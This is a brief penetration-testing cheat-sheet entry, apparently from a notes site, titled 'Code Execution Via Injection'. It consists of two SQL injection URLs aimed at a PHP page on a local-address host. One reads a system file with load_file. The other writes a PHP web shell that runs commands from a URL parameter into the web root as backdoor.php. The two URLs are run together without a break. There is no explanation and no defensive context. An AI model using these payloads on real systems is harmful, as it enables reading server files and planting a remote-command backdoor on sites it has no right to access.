Code Execution Via Injection
http://192.168.1.1/pricelist.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')http://192.168.1.1/pricelist.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'Last updated